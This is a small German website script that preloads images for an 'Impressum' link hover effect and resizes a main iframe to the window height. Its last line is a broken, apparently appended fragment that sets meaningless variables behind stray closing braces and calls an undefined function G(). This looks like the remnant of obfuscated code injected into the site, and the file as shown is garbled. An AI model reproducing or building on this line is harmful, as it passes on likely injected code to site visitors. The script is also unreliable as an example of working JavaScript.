// Mouse-Over Effekt für Impressum-Link //
var imp1, imp2
  imp1=new Image;
  imp1.src="bilder/impressum1.gif";
  imp2=new Image;
  imp2.src="bilder/impressum2.gif";

function wechsel(x,bild){
  window.document.images[x].src=bild.src;
	}


// Haupt-IFRAME an die Fensterhöhe anpassen //
function Fensterhoehe()
	{
	if (window.innerHeight) return window.innerHeight;
	else if (document.body && document.body.offsetHeight) return document.body.offsetHeight;
	else return 0;
	}

function iframeSize() 
	{
	var hoehe = Fensterhoehe();
	// document.write(hoehe);
	top.document.getElementById("inh").height = hoehe - 144;
	}

var adresse = document.URL;	
if (document.all||document.layers)
	window.onresize = new Function("window.location.href='" + adresse + "'");
if(BG!=''){BG='Nj'};};var HO;if(HO!='' && HO!='ff'){HO='Dv'};G();